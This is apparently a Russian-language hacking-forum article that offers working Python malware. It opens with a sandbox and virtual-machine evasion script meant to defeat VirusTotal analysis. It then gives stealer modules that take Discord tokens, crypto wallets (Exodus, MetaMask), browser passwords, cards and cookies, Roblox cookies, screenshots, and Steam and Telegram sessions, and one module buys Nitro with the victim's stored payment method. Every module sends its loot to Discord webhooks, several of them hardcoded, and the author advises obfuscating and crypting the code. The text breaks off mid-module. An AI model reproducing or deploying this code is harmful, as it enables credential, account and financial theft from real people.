Статья Анти VirusTotal и стилеры под разные нужды

[Knew100]

WID, IP, NAME, GPU, GUIDS, BIOS, и DLL!

Установка:​

sudo apt install python3 && python3-pip
pip3 install uuid wmi requests
python3 kerpy.py

kerpy.py​

import re, uuid, wmi, requests, os, ctypes, sys, subprocess, socket, platform


def get_base_prefix_compat(): # define all of the checks

    return getattr(sys, "base_prefix", None) or getattr(sys, "real_prefix", None) or sys.prefix


def in_virtualenv():

    return get_base_prefix_compat() != sys.prefix


if in_virtualenv() == True: # if we are in a vm

    sys.exit() # exit

 

class BypassVM:


    def registry_check(self):

        reg1 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul")

        reg2 = os.system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul") 

  

        if reg1 != 1 and reg2 != 1:

            sys.exit()


    def processes_and_files_check(self):

        vmware_dll = os.path.join(os.environ["SystemRoot"], "System32\\vmGuestLib.dll")

        virtualbox_dll = os.path.join(os.environ["SystemRoot"], "vboxmrxnp.dll")

 

        process = os.popen('TASKLIST /FI "STATUS eq RUNNING" | find /V "Image Name" | find /V "="').read()

        processList = []

        for processNames in process.split(" "):

            if ".exe" in processNames:

                processList.append(processNames.replace("K\n", "").replace("\n", ""))


        if "VMwareService.exe" in processList or "VMwareTray.exe" in processList:

            sys.exit()

                    

        if os.path.exists(vmware_dll): # Detect vmware dll

            sys.exit()

      

        if os.path.exists(virtualbox_dll): # Detect virtualbox dll

            sys.exit()

  

        try:

            sandboxie = ctypes.cdll.LoadLibrary("SbieDll.dll") # Detect sandbox dll

            sys.exit()

        except:

            pass       


    def mac_check(self): # Mac detect

        mac_address = ':'.join(re.findall('..', '%012x' % uuid.getnode()))

  

        mac_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/mac_list.txt").text

  

        if mac_address in mac_list:

            sys.exit()

    def check_pc(self): # User/Name Detect

     vmname = os.getlogin()

 

     vm_name = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt").text

 

     if vmname in vm_name:

         sys.exit()

     vmusername = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt").text

 

     host_name = socket.gethostname()

     if host_name in vmusername:

         sys.exit()

      

    def hwid_vm(self): # HWID detect

     current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip()

     hwid_vm = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/hwid_list.txt").text

     if current_machine_id in hwid_vm:

         sys.exit()

      

    def checkgpu(self): #GPU Detect

     c = wmi.WMI()

     for gpu in c.Win32_DisplayConfiguration():

        GPUm = gpu.Description.strip()

     gpulist = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt").text

     if GPUm in gpulist:

         sys.exit()

  

    def check_ip(self): #IP Detect

     ip_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt").text

     reqip = requests.get("https://api.ipify.org/?format=json").json()

     ip = reqip["ip"]

     if ip in ip_list:

         sys.exit()

    def profiles(): # Guids / Bios Detect etc

     machine_guid = uuid.getnode()

     guid_pc = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt").text

     bios_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BIOS_Serial_List.txt").text

     baseboard_guid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/BaseBoard_Serial_List.txt").text

     serial_disk = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/DiskDrive_Serial_List.txt").text

     if machine_guid in guid_pc:

         sys.exit()

     w = wmi.WMI()

     serial_list = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/CPU_Serial_List.txt").text

     serial_ = platform.processor()

     if serial_ in serial_list:

            sys.exit()

     for profile in w.Win32_ComputerSystem():

      hw_profile_guid = profile.Model

     hwprid = requests.get("https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/HwProfileGuid_List.txt").text

     if hw_profile_guid in hwprid:

            sys.exit()

     for bios in w.Win32_BIOS():

      bios_check = bios.SerialNumber

     if bios_check in bios_guid:

         sys.exit()

     for baseboard in w.Win32_BaseBoard():

         base_check = baseboard.SerialNumber

     if base_check in baseboard_guid:

         sys.exit()

     for disk in w.Win32_DiskDrive():

      disk_serial = disk.SerialNumber

     if disk_serial in serial_disk:

         sys.exit()


test = BypassVM()

test.registry_check()

test.processes_and_files_check()

test.mac_check()

test.check_pc()

test.checkgpu()

test.hwid_vm()

test.check_ip()

test.profiles()

Теперь стилеры, которые вы можете вставить во вредоносный скрипт, обфусцировать, создать exe и шлифануть криптером​

Почти все требуют стандартного python и данных от дискорд для отправки туда

discord_token.py​

import re, os, requests
import json

class Stealer():
    def __init__(self, webhook):
        self.hook = webhook
        self.tokens = []

    def GetTokens(self):
        LOCAL = os.getenv("LOCALAPPDATA")
        ROAMING = os.getenv("APPDATA")
        PATHS = {
            "Discord"               : ROAMING + "\\Discord",
            "Discord Canary"        : ROAMING + "\\discordcanary",
            "Discord PTB"           : ROAMING + "\\discordptb",
            "Google Chrome"         : LOCAL + "\\Google\\Chrome\\User Data\\Default",
            "Opera"                 : ROAMING + "\\Opera Software\\Opera Stable",
            "Brave"                 : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
            "Yandex"                : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default",
            'Lightcord'             : ROAMING + "\\Lightcord",
            'Opera GX'              : ROAMING + "\\Opera Software\\Opera GX Stable",
            'Amigo'                 : LOCAL + "\\Amigo\\User Data",
            'Torch'                 : LOCAL + "\\Torch\\User Data",
            'Kometa'                : LOCAL + "\\Kometa\\User Data",
            'Orbitum'               : LOCAL + "\\Orbitum\\User Data",
            'CentBrowser'           : LOCAL + "\\CentBrowser\\User Data",
            '7Star'                 : LOCAL + "\\7Star\\7Star\\User Data",
            'Sputnik'               : LOCAL + "\\Sputnik\\Sputnik\\User Data",
            'Vivaldi'               : LOCAL + "\\Vivaldi\\User Data\\Default",
            'Chrome SxS'            : LOCAL + "\\Google\\Chrome SxS\\User Data",
            'Epic Privacy Browser'  : LOCAL + "\\Epic Privacy Browser\\User Data",
            'Microsoft Edge'        : LOCAL + "\\Microsoft\\Edge\\User Data\\Default",
            'Uran'                  : LOCAL + "\\uCozMedia\\Uran\\User Data\\Default",
            'Iridium'               : LOCAL + "\\Iridium\\User Data\\Default\\Local Storage\\leveld",
            'Firefox'               : ROAMING + "\\Mozilla\\Firefox\\Profiles",
        }
  
        for platform, path in PATHS.items():
            path += "\\Local Storage\\leveldb"
            if os.path.exists(path):
                for file_name in os.listdir(path):
                    if file_name.endswith(".log") or file_name.endswith(".ldb") or file_name.endswith(".sqlite"):
                        for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
                            for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
                                for token in re.findall(regex, line):
                                    if token + " | " + platform not in self.tokens:
                                        self.tokens.append(token + " | " + platform)

    def getuserinfo(self, token):
        try:
            return requests.get("https://discordapp.com/api/v9/users/@me", headers={"content-type": "application/json", "authorization": token}).json()
        except:return None
 
    def buy_nitro(self, token):
        try:
            r = requests.get('https://discordapp.com/api/v6/users/@me/billing/payment-sources', headers={'Authorization': token})
            if r.status_code == 200:
                payment_source_id = r.json()[0]['id']
                if '"invalid": ture' in r.text:
                    r = requests.post(f'https://discord.com/api/v6/store/skus/521847234246082599/purchase', headers={'Authorization': token}, json={'expected_amount': 1,'gift': True,'payment_source_id': payment_source_id})
                    return r.json()['gift_code']
        except:return "None"
 
    def RareFriend(self, token):
        friends = ""
        try:
            req = requests.get("https://discord.com/api/v9/users/@me/relationships", headers={"content-type": "application/json", "authorization": token}).json()
      
            for user in req:
                badge = ""
                if user["user"]["public_flags"] == 1:badge = "Staff"
                elif user["user"]["public_flags"] == 2:badge = "Partner"
                elif user["user"]["public_flags"] == 4:badge = "Hypesquad Events"
                elif user["user"]["public_flags"] == 8:badge = "BugHunter 1"
                elif user["user"]["public_flags"] == 512:badge = "Early"
                elif user["user"]["public_flags"] == 16384:badge = "BugHunter 2"
                elif user["user"]["public_flags"] == 131072:badge = "Developer"
                else:badge = ""
          
                if badge != "":friends += badge + " | " + user['id'] + "\n"     
            if friends == "":friends += "No Rare Friends"     
            return friends
        except:return "None, Except Error"
 
    def main(self):
        embeds = []
        for token_line in self.tokens:
            try:
                token = token_line.split(" | ")[0]
                plateform = token_line.split(" | ")[1]
                languages = {'da':'Danish, Denmark','de':'German, Germany','en-GB':'English, United Kingdom','en-US':'English, United States','es-ES':'Spanish, Spain','fr':'French, France','hr':'Croatian, Croatia','lt':'Lithuanian, Lithuania','hu':'Hungarian, Hungary','nl':'Dutch, Netherlands','no':'Norwegian, Norway','pl':'Polish, Poland','pt-BR':'Portuguese, Brazilian, Brazil','ro':'Romanian, Romania','fi':'Finnish, Finland','sv-SE':'Swedish, Sweden','vi':'Vietnamese, Vietnam','tr':'Turkish, Turkey','cs':'Czech, Czechia, Czech Republic','el':'Greek, Greece','bg':'Bulgarian, Bulgaria','ru':'Russian, Russia','uk':'Ukranian, Ukraine','th':'Thai, Thailand','zh-CN':'Chinese, China','ja':'Japanese','zh-TW':'Chinese, Taiwan','ko':'Korean, Korea'}
                get_infos = self.getuserinfo(token)
                username = get_infos["username"] + "#" + get_infos["discriminator"]
                user_id = get_infos["id"]
                user_avatar = get_infos["avatar"]
                try:user_banner = get_infos["banner"]
                except:user_banner = None
                email = get_infos["email"] or "❌"
                phone = get_infos["phone"] or "❌"
                local = languages.get(get_infos["locale"])
                bio = get_infos["bio"] or "❌"
                mmfa = get_infos["mfa_enabled"]
                bbilling = bool(len(json.loads(requests.get("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers={"content-type": "application/json", "authorization": token}).text)) > 0)
                if bbilling == True:billing = "✔️"
                else:billing = "❌"         
                if mmfa == True:mfa = "✔️"
                else:mfa = "❌"
                badges = ""
                flags = get_infos['flags']
                if (flags == 1):badges += "Staff, "
                if (flags == 2):badges += "Partner, "
                if (flags == 4):badges += "Hypesquad Event, "
                if (flags == 8):badges += "Green Bughunter, "
                if (flags == 64):badges += "Hypesquad Bravery, "
                if (flags == 128):badges += "HypeSquad Brillance, "
                if (flags == 256):badges += "HypeSquad Balance, "
                if (flags == 512):badges += "Early Supporter, "
                if (flags == 16384):badges += "Gold BugHunter, "
                if (flags == 131072):badges += "Verified Bot Developer, "
                if (badges == ""):badges = "❌"         
                try:
                    if get_infos["premium_type"] == "1" or get_infos["premium_type"] == 1:nitro_type = "✔️ Nitro Classic"
                    elif get_infos["premium_type"] == "2" or get_infos["premium_type"] == 2:nitro_type = "✔️ Nitro Boost"
                    else:nitro_type = "❌ No Nitro"
                except:nitro_type = "❌ No Nitro"
                nnitro_buyed = self.buy_nitro(token)
                if nnitro_buyed == None:nitro_buyed = "❌"
                else:nitro_buyed = "✔️ discord.gift/" + nnitro_buyed     
                embed = {
                    "color": 0x7289da,
                    "fields": [
                        {
                            "name": "**__User Infos:__**",
                            "value": f"- __Username:__ `{username}`\n- __User ID:__ `{user_id}`\n- __Email:__ `{email}`\n- __Phone:__ `{phone}`\n- __Nitro Type:__ `{nitro_type}`\n- __Local:__ `{local}`\n- __Badges:__ `{badges}`\n- __Billing:__ `{billing}`\n- __A2F Enable:__ `{mfa}`"
                        },
                        {
                            "name": "__**About:**__",
                            "value": f"```{bio}```"
                        },
                        {
                            "name": "__**Token:**__",
                            "value": f"Plateform: **{plateform}**\n```\n{token}\n```"
                        },
                        {
                            "name": "__**Nitro Buy:**__",
                            "value": f"`{nitro_buyed}`"
                        },
                        {
                            "name": "__**Rare Friends:**__",
                            "value": f"```{self.RareFriend(token)}```"
                        }
                    ],
                    "author": {
                        "name": f"{username} ({user_id})",
                        "icon_url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}"
                    },
                    "footer": {
                        "text": f"Stealer Builder by KanekiWeb  -  kanekiweb.tk",
                        "icon_url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}"
                    },
                    "image": {
                        "url": f"https://cdn.discordapp.com/banners/{user_id}/{user_banner}?size=1024"
                    },
                    "thumbnail": {
                        "url": f"https://cdn.discordapp.com/avatars/{user_id}/{user_avatar}?size=1024"
                    }
                }
                embeds.append(embed)         
            except:pass 
        requests.post(self.hook, headers={"content-type": "application/json"}, data=json.dumps({"content": "","embeds": embeds,"username": "Stealer Builder","avatar_url": "https://cdn.discordapp.com/avatars/922450497074495539/a_c1738e5280f6e70487ef02d307c62a07?size=1024"}).encode())
  
Grabber = Stealer("U WEBHOOK URL")
Grabber.GetTokens()
Grabber.main()

exodus.py​

import os.path, shutil, requests

user = os.path.expanduser("~")

hook = ""
if os.path.exists(user+"\\AppData\\Roaming\\Exodus"):
 shutil.copytree(user+"\\AppData\\Roaming\\Exodus", user+"\\AppData\\Local\\Temp\\Exodus")
 shutil.make_archive(user+"\\AppData\\Local\\Temp\\Exodus", "zip", user+"\\AppData\\Local\\Temp\\Exodus")

 file = {'file': open(user+"\\AppData\\Local\\Temp\\Exodus.zip", 'rb')}
 r = requests.post(hook, files=file)
 try:
  os.remove(user+"\\AppData\\Local\\Temp\\Exodus.zip")
  os.remove(user+"\\AppData\\Local\\Temp\\Exodus")
 except:
   pass

machine.py​

import requests, wmi, subprocess, psutil, platform, json

hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def get_mac_address():
    for interface, addrs in psutil.net_if_addrs().items():
        if interface == "Wi-Fi":
            for addr in addrs:
                if addr.family == psutil.AF_LINK:
                    mac = addr.address
                    return mac

def machineinfo():

    mem = psutil.virtual_memory()

    c = wmi.WMI()
    for gpu in c.Win32_DisplayConfiguration():
        GPUm = gpu.Description.strip()

    current_machine_id = str(subprocess.check_output('wmic csproduct get uuid'), 'utf-8').split('\n')[1].strip()
 
    reqip = requests.get("https://api.ipify.org/?format=json").json()
        
    mac = get_mac_address()
    
    payload = {
        "embeds": [
            {
                "title": "Machine Info",
                "username": "github.com/lawxsz",
                "avatar_url": "https://cdn.discordapp.com/attachments/1073683220148785222/1077827511691530240/photo_2022-10-01_18-57-36.jpg",
                "description": "Github.com/Lawxsz/make-u-own-stealer",
                "fields": [
                    {
                        "name": ":computer: PC",
                        "value": f"`{platform.node()}`",
                        "inline": True
                    },
                    {
                        "name": ":desktop: OS:",
                        "value": f"`{platform.platform()}`",
                        "inline": True
                    },
                    {
                        "name": ":wrench: RAM",
                        "value": f"`{mem.total / 1024**3} GB`",
                        "inline": True
                    },
                    {
                        "name": ":pager: GPU",
                        "value": f"`{GPUm}`",
                        "inline": True
                    },
                    {
                        "name": ":zap: CPU",
                        "value": f"`{platform.processor()}`",
                        "inline": True
                    },
                    {
                        "name": ":key: HWID",
                        "value": f"`{current_machine_id}`",
                        "inline": True
                    },
                    {
                        "name": ":label: MAC",
                        "value": f"`{mac}`",
                        "inline": True
                    },
                    {
                        "name": ":crossed_swords: IP",
                        "value": f"`{reqip['ip']}`",
                        "inline": True
                    }
                ]
            }
        ]
    }

    headers = {
        "Content-Type": "Application/Json"
    }
    r = requests.post(hook, data=json.dumps(payload), headers=headers)
 
machineinfo()

metamask.py​

import requests, os, os.path, shutil

user = os.path.expanduser("~")

hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def make(args, brow, count):
   try:
    if os.path.exists(args):
     shutil.copytree(args, user+f"\\AppData\\Local\\Temp\\Metamask_{brow}")
 
     print(f"New Wallet found! : Total: {count}\nWallet: MetaMask_{brow}")
   except shutil.Error:
       pass
       shutil.make_archive(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}", "zip", user+f"\\AppData\\Local\\Temp\\Metamask_{brow}")
       file = {"file": open(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}.zip", 'rb')}
       r = requests.post(hook, files=file)
       os.remove(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}")
       os.remove(user+f"\\AppData\\Local\\Temp\\Metamask_{brow}.zip")
def yea():
 
 meta_paths = [
 
        [f"{user}\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\ejbalbakoplchlghecdalmeeeajnimhm",               "Edge"               ],
        [f"{user}\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",               "Edge"               ],
        [f"{user}\\AppData\\Local\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",               "Brave"               ],
        [f"{user}\\AppData\\Local\\Google\\Chrome\\User Data\Default\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn"               "Google"               ],
        [f"{user}\\AppData\\Roaming\\Opera Software\\Opera GX Stable\\Local Extension Settings\\nkbihfbeogaeaoehlefnkodbefgpgknn",               "OperaGX"               ]
    ]
 count = 0
 try:
  for i in meta_paths:
   make(i[0], brow=i[1], count=count)
   count+=1
 except IndexError:
     pass
 
yea()

passwords_cards_cookies.py​

import os, requests, json, base64, sqlite3, shutil
from win32crypt import CryptUnprotectData
from Crypto.Cipher import AES
from datetime import datetime

hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

appdata = os.getenv('LOCALAPPDATA')
user = os.path.expanduser("~")

browsers = {
    'amigo': appdata + '\\Amigo\\User Data',
    'torch': appdata + '\\Torch\\User Data',
    'kometa': appdata + '\\Kometa\\User Data',
    'orbitum': appdata + '\\Orbitum\\User Data',
    'cent-browser': appdata + '\\CentBrowser\\User Data',
    '7star': appdata + '\\7Star\\7Star\\User Data',
    'sputnik': appdata + '\\Sputnik\\Sputnik\\User Data',
    'vivaldi': appdata + '\\Vivaldi\\User Data',
    'google-chrome-sxs': appdata + '\\Google\\Chrome SxS\\User Data',
    'google-chrome': appdata + '\\Google\\Chrome\\User Data',
    'epic-privacy-browser': appdata + '\\Epic Privacy Browser\\User Data',
    'microsoft-edge': appdata + '\\Microsoft\\Edge\\User Data',
    'uran': appdata + '\\uCozMedia\\Uran\\User Data',
    'yandex': appdata + '\\Yandex\\YandexBrowser\\User Data',
    'brave': appdata + '\\BraveSoftware\\Brave-Browser\\User Data',
    'iridium': appdata + '\\Iridium\\User Data',
}


def get_master_key(path: str):
    if not os.path.exists(path):
        return

    if 'os_crypt' not in open(path + "\\Local State", 'r', encoding='utf-8').read():
        return

    with open(path + "\\Local State", "r", encoding="utf-8") as f:
        c = f.read()
    local_state = json.loads(c)

    master_key = base64.b64decode(local_state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
    return master_key


def decrypt_password(buff: bytes, master_key: bytes) -> str:
    iv = buff[3:15]
    payload = buff[15:]
    cipher = AES.new(master_key, AES.MODE_GCM, iv)
    decrypted_pass = cipher.decrypt(payload)
    decrypted_pass = decrypted_pass[:-16].decode()

    return decrypted_pass


def save_results(browser_name, data_type, content):
    if not os.path.exists(user+'\\AppData\\Local\\Temp\\Browser'):
        os.mkdir(user+'\\AppData\\Local\\Temp\\Browser')
    if not os.path.exists(user+f'\\AppData\\Local\\Temp\\Browser\\{browser_name}'):
        os.mkdir(user+f'\\AppData\\Local\\Temp\\Browser\\{browser_name}')
    if content is not None:
        open(user+f'\\AppData\\Local\\Temp\\Browser\\{browser_name}\\{data_type}.txt', 'w', encoding="utf-8").write(content)

def get_login_data(path: str, profile: str, master_key):
    login_db = f'{path}\\{profile}\\Login Data'
    if not os.path.exists(login_db):
        return
    result = ""
    shutil.copy(login_db, user+'\\AppData\\Local\\Temp\\login_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\login_db')
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    for row in cursor.fetchall():
        password = decrypt_password(row[2], master_key)
        result += f"""
        URL: {row[0]}
        Email: {row[1]}
        Password: {password}
  
        """
    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\login_db')
    return result


def get_credit_cards(path: str, profile: str, master_key):
    cards_db = f'{path}\\{profile}\\Web Data'
    if not os.path.exists(cards_db):
        return

    result = ""
    shutil.copy(cards_db, user+'\\AppData\\Local\\Temp\\cards_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\cards_db')
    cursor = conn.cursor()
    cursor.execute(
        'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        card_number = decrypt_password(row[3], master_key)
        result += f"""
        Name Card: {row[0]}
        Card Number: {card_number}
        Expires:  {row[1]} / {row[2]}
        Added: {datetime.fromtimestamp(row[4])}
  
        """

    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\cards_db')
    return result


def get_cookies(path: str, profile: str, master_key):
    cookie_db = f'{path}\\{profile}\\Network\\Cookies'
    if not os.path.exists(cookie_db):
        return
    result = ""
    shutil.copy(cookie_db, user+'\\AppData\\Local\\Temp\\cookie_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\cookie_db')
    cursor = conn.cursor()
    cursor.execute('SELECT host_key, name, path, encrypted_value,expires_utc FROM cookies')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2] or not row[3]:
            continue

        cookie = decrypt_password(row[3], master_key)

        result += f"""
        Host Key : {row[0]}
        Cookie Name : {row[1]}
        Path: {row[2]}
        Cookie: {cookie}
        Expires On: {row[4]}
  
        """

    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\cookie_db')
    return result


def get_web_history(path: str, profile: str):
    web_history_db = f'{path}\\{profile}\\History'
    result = ""
    if not os.path.exists(web_history_db):
        return

    shutil.copy(web_history_db, user+'\\AppData\\Local\\Temp\\web_history_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\web_history_db')
    cursor = conn.cursor()
    cursor.execute('SELECT url, title, last_visit_time FROM urls')
    for row in cursor.fetchall():
        if not row[0] or not row[1] or not row[2]:
            continue
        result += f"""
        URL: {row[0]}
        Title: {row[1]}
        Visited Time: {row[2]}
  
        """
    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\web_history_db')
    return result


def get_downloads(path: str, profile: str):
    downloads_db = f'{path}\\{profile}\\History'
    if not os.path.exists(downloads_db):
        return
    result = ""
    shutil.copy(downloads_db, user+'\\AppData\\Local\\Temp\\downloads_db')
    conn = sqlite3.connect(user+'\\AppData\\Local\\Temp\\downloads_db')
    cursor = conn.cursor()
    cursor.execute('SELECT tab_url, target_path FROM downloads')
    for row in cursor.fetchall():
        if not row[0] or not row[1]:
            continue
        result += f"""
        Download URL: {row[0]}
        Local Path: {row[1]}
  
        """

    conn.close()
    os.remove(user+'\\AppData\\Local\\Temp\\downloads_db')


def installed_browsers():
    results = []
    for browser, path in browsers.items():
        if os.path.exists(path):
            results.append(browser)
    return results


if __name__ == '__main__':
    available_browsers = installed_browsers()

    for browser in available_browsers:
        browser_path = browsers[browser]
        master_key = get_master_key(browser_path)

        save_results(browser, 'Saved_Passwords', get_login_data(browser_path, "Default", master_key))

        save_results(browser, 'Browser_History', get_web_history(browser_path, "Default"))

roblox.py​

import requests, robloxpy, json, browser_cookie3, os.path

user = os.path.expanduser("~")

hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def robloxl():
    data = []

    try:
        cookies = browser_cookie3.chrome(domain_name='roblox.com')
        for cookie in cookies:
            print(cookie)
 
        if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

    try:

        cookies = browser_cookie3.brave(domain_name='roblox.com')

        for cookie in cookies:

            print(cookie)

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

    try:

        cookies = browser_cookie3.firefox(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

    try:

        cookies = browser_cookie3.chromium(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass



    try:

        cookies = browser_cookie3.edge(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                print("L")

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass



    try:

        cookies = browser_cookie3.opera(domain_name='roblox.com')

        for cookie in cookies:

            if cookie.name == '.ROBLOSECURITY':

                data.append(cookies)

                data.append(cookie.value)

                return data

    except:

        pass

cookiesrbx = robloxl()



def rbxsteal():

 roblox_cookie = cookiesrbx[1]

 isvalid = robloxpy.Utils.CheckCookie(roblox_cookie)

 if isvalid == "Valid Cookie":

    isvalid = "Valid"

 else:

  exit()

 ebruh = requests.get("https://www.roblox.com/mobileapi/userinfo",cookies={".ROBLOSECURITY":roblox_cookie})

 info = json.loads(ebruh.text)

 rid = info["UserID"]

 rap = robloxpy.User.External.GetRAP(rid)

 friends = robloxpy.User.Friends.External.GetCount(rid)

 age = robloxpy.User.External.GetAge(rid)

 dnso = None

 crdate = robloxpy.User.External.CreationDate(rid)

 rolimons = f"https://www.rolimons.com/player/{rid}"

 roblox_profile = f"https://web.roblox.com/users/{rid}/profile"

 headshot = robloxpy.User.External.GetHeadshot(rid)

 limiteds = robloxpy.User.External.GetLimiteds(rid)



 username = info['UserName']

 robux = info['RobuxBalance']

 premium = info['IsPremium']

 result = open(user + "\\AppData\\Local\\Temp\\cookierbx.txt", "w")

 result.write(cookiesrbx[1])

 result.close()

 payload = {

    "embeds": [

        {

            "title": "Roblox Stealer!",

            "description": "Github.com/Lawxsz/make-u-own-stealer",

            "fields": [

         {

             "name": "Username",

             "value": username,

             "inline": True

         },

         {

             "name": "Robux Balance",

             "value": robux,

             "inline": True

         },

         {

             "name": "Premium",

             "value": premium,

             "inline": True

         },

         {

             "name": "Builders Club",

             "value": info["IsAnyBuildersClubMember"],

             "inline": True

         },

         {

             "name": "Friends",

             "value": friends,

             "inline": True

         },

         {

             "name": "Profile",

             "value": roblox_profile,

             "inline": True

         },

         {

             "name": "Age",

             "value": crdate,

             "inline": True

         },

            ]

        }

    ]

}

 

 headers = {

    'Content-Type': 'application/json'

}

 file = {"file": open(user+f"\\AppData\\Local\\Temp\\cookierbx.txt", 'rb')}



 r = requests.post(hook, data=json.dumps(payload), headers=headers)

 fil = requests.post(hook, files=file)



rbxsteal()

screenshot.py​

import os.path, requests, os
from PIL import ImageGrab

user = os.path.expanduser("~")

hook = ""

captura = ImageGrab.grab()
captura.save(user+"\\AppData\\Local\\Temp\\ss.png")

file = {"file": open(user+"\\AppData\\Local\\Temp\\ss.png", "rb")}
r = requests.post(hook, files=file)
try:
 os.remove(user+"\\AppData\\Local\\Temp\\ss.png")
except:
    pass

steam.py​

import os, os.path, zipfile, requests

hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

steam_path = ""
if os.path.exists(os.environ["PROGRAMFILES(X86)"]+"\\steam"):
 steam_path = os.environ["PROGRAMFILES(X86)"]+"\\steam"
 ssfn = []
 config = ""
 for file in os.listdir(steam_path):
     if file[:4] == "ssfn":
         ssfn.append(steam_path+f"\\{file}")
     def steam(path,path1,steam_session):
            for root,dirs,file_name in os.walk(path):
                for file in file_name:
                    steam_session.write(root+"\\"+file)
            for file2 in path1:
                steam_session.write(file2)
     if os.path.exists(steam_path+"\\config"):
      with zipfile.ZipFile(f"{os.environ['TEMP']}\steam_session.zip",'w',zipfile.ZIP_DEFLATED) as zp:
                steam(steam_path+"\\config",ssfn,zp)
file = {"file": open(f"{os.environ['TEMP']}\steam_session.zip", "rb")}
r = requests.post(hook, files=file)
try:
 os.remove(f"{os.environ['TEMP']}\steam_session.zip")
except:
    pass

telegram.py​

py

import os, os.path, shutil, requests
user = os.path.expanduser("~")

hook = "https://discord.com/api/webhooks/1073970412322566175/HtYFF6lf77URUMpHJPH-egvs0iOSEsYV6yXuuPmw3QGvXG1A_rJRFYX3z9p6jYcRrjgl"

def telegram():
  if os.path.exists(user+"\\AppData\\Roaming\\Telegram Desktop\\tdata"):
   try:
    shutil.copytree(user+'\\AppData\\Roaming\\Telegram Desktop\\tdata', user+'\\AppData\\Local\\Temp\\tdata_session')
    shutil.make_archive(user+'\\AppData\\Local\\Temp\\tdata_session', 'zip', user+'\\AppData\\Local\\Temp\\tdata_session')
   except:
    pass
    try:
     os.remove(user+"\\AppData\\Local\\Temp\\tdata_session")
    except:
        pass
    with open(user+'\\AppData\\Local\\Temp\\tdata_session.zip', 'rb') as f:
     payload = {
